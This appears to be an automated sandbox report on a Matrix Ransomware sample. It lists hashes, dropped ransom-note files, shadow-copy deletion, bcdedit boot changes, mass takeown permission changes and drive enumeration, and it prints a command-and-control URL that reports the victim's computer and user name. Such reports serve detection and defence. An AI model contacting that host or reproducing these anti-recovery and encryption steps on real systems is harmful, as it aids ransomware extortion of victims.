Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
15-10-2020 17:17
Static task
static1
Behavioral task
behavioral1
Sample
afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
Resource
win7v200722
Behavioral task
behavioral2
Sample
afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
Resource
win10v200722
General
-
Target
afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
-
Size
1.2MB
-
MD5
b3b77dc22f4f656dd036d6dc3b43f6e2
-
SHA1
4dd84a6c87e777ad12aeb38c0bba81892c5e464d
-
SHA256
afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40
-
SHA512
627c50a17ed35765864da2755782813d90e700c568af5fa3e6feca840a035c99b4f7352ef70ef1191bf9bf78d7e26bacbbb6f31416bcebe757a2fbfe7e592b87
Malware Config
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
description flow ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sv-se\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-gb\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ja-jp\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\hr-hr\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files-select\js\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ro-ro\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\uk-ua\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Users\Public\AccountPictures\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Users\Admin\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files\Java\jdk1.8.0_66\bin\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\es-es\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hr-hr\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\zh-cn\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-il\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\es-es\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\cs-cz\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ko-kr\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sv-se\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\pl-pl\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\uk-ua\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{236341fa-7ef4-4d1c-ad26-f62f16dcfc1d}\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\de\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\ko\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-gb\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\it-it\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sq\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe HTTP URL 7 http://sec.timerz.org/addrecord.php?apikey=ab89_api_key&compuser=LZUKLIOU|Admin&sid=ERzyGiK47fXXkTmP&phase=START Process not Found File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\iq5q997v.default-release\startupCache\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{7d78bb13-b83b-41fe-ae21-cd1abb58c9b6}\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\Settings\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\es-es\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-il\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\eu-es\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\fi-fi\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\sv-se\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-ae\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files\Mozilla Firefox\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-gb\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\as-IN\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files\Java\jre1.8.0_66\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-ma\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\eu-es\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\pt-br\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iq5q997v.default-release\storage\permanent\chrome\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ja-jp\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\he-il\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\hr-hr\AB89_INFO.rtf afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 5608 bcdedit.exe 5768 bcdedit.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS PsYzXFib64.exe -
Executes dropped EXE 64 IoCs
pid Process 3416 NWQEgMSH.exe 4156 PsYzXFib.exe 4196 PsYzXFib64.exe 4340 PsYzXFib.exe 4364 PsYzXFib.exe 4496 PsYzXFib.exe 4520 PsYzXFib.exe 4676 PsYzXFib.exe 4700 PsYzXFib.exe 4828 PsYzXFib.exe 4852 PsYzXFib.exe 4984 PsYzXFib.exe 5008 PsYzXFib.exe 4124 PsYzXFib.exe 4164 PsYzXFib.exe 4356 PsYzXFib.exe 4384 PsYzXFib.exe 4532 PsYzXFib.exe 4420 PsYzXFib.exe 4600 PsYzXFib.exe 4584 PsYzXFib.exe 4744 PsYzXFib.exe 4936 PsYzXFib.exe 5096 PsYzXFib.exe 5104 PsYzXFib.exe 4320 PsYzXFib.exe 4372 PsYzXFib.exe 4432 PsYzXFib.exe 4424 PsYzXFib.exe 4740 PsYzXFib.exe 4576 PsYzXFib.exe 5004 PsYzXFib.exe 4904 PsYzXFib.exe 1792 PsYzXFib.exe 2588 PsYzXFib.exe 4292 PsYzXFib.exe 4712 PsYzXFib.exe 4396 PsYzXFib.exe 4832 PsYzXFib.exe 5052 PsYzXFib.exe 4120 PsYzXFib.exe 4508 PsYzXFib.exe 4488 PsYzXFib.exe 4624 PsYzXFib.exe 4940 PsYzXFib.exe 3912 PsYzXFib.exe 3752 PsYzXFib.exe 4964 PsYzXFib.exe 1772 PsYzXFib.exe 4708 PsYzXFib.exe 64 PsYzXFib.exe 3676 PsYzXFib.exe 3672 PsYzXFib.exe 4328 PsYzXFib.exe 4564 PsYzXFib.exe 4132 PsYzXFib.exe 3612 PsYzXFib.exe 908 PsYzXFib.exe 4252 PsYzXFib.exe 4788 PsYzXFib.exe 4268 PsYzXFib.exe 5060 PsYzXFib.exe 4108 PsYzXFib.exe 4512 PsYzXFib.exe -
Modifies extensions of user files 2 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File opened for modification C:\Users\Admin\Pictures\NewConnect.tiff afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Users\Admin\Pictures\ConvertToWrite.tiff afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe -
Sets service image path in registry 2 TTPs
-
resource yara_rule behavioral2/files/0x000100000001ad65-17.dat upx behavioral2/files/0x000100000001ad65-18.dat upx behavioral2/files/0x000100000001ad65-27.dat upx behavioral2/files/0x000100000001ad65-29.dat upx behavioral2/files/0x000100000001ad65-35.dat upx behavioral2/files/0x000100000001ad65-37.dat upx behavioral2/files/0x000100000001ad65-43.dat upx behavioral2/files/0x000100000001ad65-45.dat upx behavioral2/files/0x000100000001ad65-51.dat upx behavioral2/files/0x000100000001ad65-53.dat upx behavioral2/files/0x000100000001ad65-59.dat upx behavioral2/files/0x000100000001ad65-61.dat upx behavioral2/files/0x000100000001ad65-67.dat upx behavioral2/files/0x000100000001ad65-69.dat upx behavioral2/files/0x000100000001ad65-75.dat upx behavioral2/files/0x000100000001ad65-77.dat upx behavioral2/files/0x000100000001ad65-83.dat upx behavioral2/files/0x000100000001ad65-85.dat upx behavioral2/files/0x000100000001ad65-91.dat upx behavioral2/files/0x000100000001ad65-93.dat upx behavioral2/files/0x000100000001ad65-99.dat upx behavioral2/files/0x000100000001ad65-101.dat upx behavioral2/files/0x000100000001ad65-107.dat upx behavioral2/files/0x000100000001ad65-109.dat upx behavioral2/files/0x000100000001ad65-115.dat upx behavioral2/files/0x000100000001ad65-117.dat upx behavioral2/files/0x000100000001ad65-123.dat upx behavioral2/files/0x000100000001ad65-125.dat upx behavioral2/files/0x000100000001ad65-131.dat upx behavioral2/files/0x000100000001ad65-133.dat upx behavioral2/files/0x000100000001ad65-139.dat upx behavioral2/files/0x000100000001ad65-141.dat upx behavioral2/files/0x000100000001ad65-147.dat upx behavioral2/files/0x000100000001ad65-150.dat upx behavioral2/files/0x000100000001ad65-157.dat upx behavioral2/files/0x000100000001ad65-159.dat upx behavioral2/files/0x000100000001ad65-165.dat upx behavioral2/files/0x000100000001ad65-167.dat upx behavioral2/files/0x000100000001ad65-173.dat upx behavioral2/files/0x000100000001ad65-175.dat upx behavioral2/files/0x000100000001ad65-181.dat upx behavioral2/files/0x000100000001ad65-183.dat upx behavioral2/files/0x000100000001ad65-189.dat upx behavioral2/files/0x000100000001ad65-191.dat upx behavioral2/files/0x000100000001ad65-199.dat upx behavioral2/files/0x000100000001ad65-201.dat upx behavioral2/files/0x000100000001ad65-207.dat upx behavioral2/files/0x000100000001ad65-209.dat upx behavioral2/files/0x000100000001ad65-215.dat upx behavioral2/files/0x000100000001ad65-217.dat upx behavioral2/files/0x000100000001ad65-223.dat upx behavioral2/files/0x000100000001ad65-225.dat upx behavioral2/files/0x000100000001ad65-231.dat upx behavioral2/files/0x000100000001ad65-233.dat upx behavioral2/files/0x000100000001ad65-239.dat upx behavioral2/files/0x000100000001ad65-241.dat upx behavioral2/files/0x000100000001ad65-247.dat upx behavioral2/files/0x000100000001ad65-249.dat upx behavioral2/files/0x000100000001ad65-255.dat upx behavioral2/files/0x000100000001ad65-257.dat upx behavioral2/files/0x000100000001ad65-264.dat upx behavioral2/files/0x000100000001ad65-266.dat upx behavioral2/files/0x000100000001ad65-273.dat upx behavioral2/files/0x000100000001ad65-275.dat upx -
Modifies file permissions 1 TTPs 64 IoCs
pid Process 4640 takeown.exe 4256 takeown.exe 5304 takeown.exe 6028 takeown.exe 4844 takeown.exe 4284 takeown.exe 5828 takeown.exe 6116 takeown.exe 3844 takeown.exe 4116 takeown.exe 4260 takeown.exe 5612 takeown.exe 6128 takeown.exe 5100 takeown.exe 5272 takeown.exe 264 takeown.exe 5976 takeown.exe 5552 takeown.exe 4908 takeown.exe 2052 takeown.exe 5820 takeown.exe 5296 takeown.exe 5720 takeown.exe 4880 takeown.exe 4456 takeown.exe 4408 takeown.exe 4360 takeown.exe 4704 takeown.exe 5952 takeown.exe 4152 takeown.exe 5652 takeown.exe 4468 takeown.exe 4500 takeown.exe 4616 takeown.exe 4960 takeown.exe 2568 takeown.exe 5300 takeown.exe 5600 takeown.exe 4868 takeown.exe 4976 takeown.exe 3756 takeown.exe 4920 takeown.exe 4300 takeown.exe 4948 takeown.exe 3040 takeown.exe 4288 takeown.exe 2476 takeown.exe 5668 takeown.exe 4916 takeown.exe 5016 takeown.exe 5948 takeown.exe 4672 takeown.exe 4504 takeown.exe 4696 takeown.exe 6104 takeown.exe 5012 takeown.exe 4792 takeown.exe 4344 takeown.exe 5728 takeown.exe 3828 takeown.exe 5588 takeown.exe 5756 takeown.exe 4632 takeown.exe 4528 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 26 IoCs
description ioc Process File opened for modification C:\Users\Public\Downloads\desktop.ini afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Users\Admin\Documents\desktop.ini afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Users\Admin\Links\desktop.ini afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Users\Admin\Searches\desktop.ini afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Users\Public\Desktop\desktop.ini afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files\desktop.ini afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Program Files (x86)\desktop.ini afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Users\Public\Libraries\desktop.ini afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Users\Admin\Music\desktop.ini afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Users\Public\Documents\desktop.ini afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Users\Admin\Videos\desktop.ini afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Users\Public\Videos\desktop.ini afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Users\Public\Pictures\desktop.ini afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Users\Public\desktop.ini afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened for modification C:\Users\Public\Music\desktop.ini afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Y: PsYzXFib64.exe File opened (read-only) \??\Z: PsYzXFib64.exe File opened (read-only) \??\W: afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened (read-only) \??\L: afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened (read-only) \??\K: afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened (read-only) \??\H: afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened (read-only) \??\M: PsYzXFib64.exe File opened (read-only) \??\Q: PsYzXFib64.exe File opened (read-only) \??\Q: afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened (read-only) \??\B: PsYzXFib64.exe File opened (read-only) \??\H: PsYzXFib64.exe File opened (read-only) \??\X: PsYzXFib64.exe File opened (read-only) \??\O: PsYzXFib64.exe File opened (read-only) \??\P: PsYzXFib64.exe File opened (read-only) \??\Z: afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened (read-only) \??\Y: afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened (read-only) \??\O: afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened (read-only) \??\N: afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened (read-only) \??\E: afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened (read-only) \??\K: PsYzXFib64.exe File opened (read-only) \??\U: PsYzXFib64.exe File opened (read-only) \??\V: afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened (read-only) \??\U: afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened (read-only) \??\R: afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened (read-only) \??\G: afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened (read-only) \??\J: PsYzXFib64.exe File opened (read-only) \??\M: afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened (read-only) \??\J: afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened (read-only) \??\A: PsYzXFib64.exe File opened (read-only) \??\W: PsYzXFib64.exe File opened (read-only) \??\T: afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened (read-only) \??\S: afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened (read-only) \??\E: PsYzXFib64.exe File opened (read-only) \??\G: PsYzXFib64.exe File opened (read-only) \??\R: PsYzXFib64.exe File opened (read-only) \??\V: PsYzXFib64.exe File opened (read-only) \??\P: afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened (read-only) \??\I: afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened (read-only) \??\F: afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe File opened (read-only) \??\I: PsYzXFib64.exe File opened (read-only) \??\X: afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe 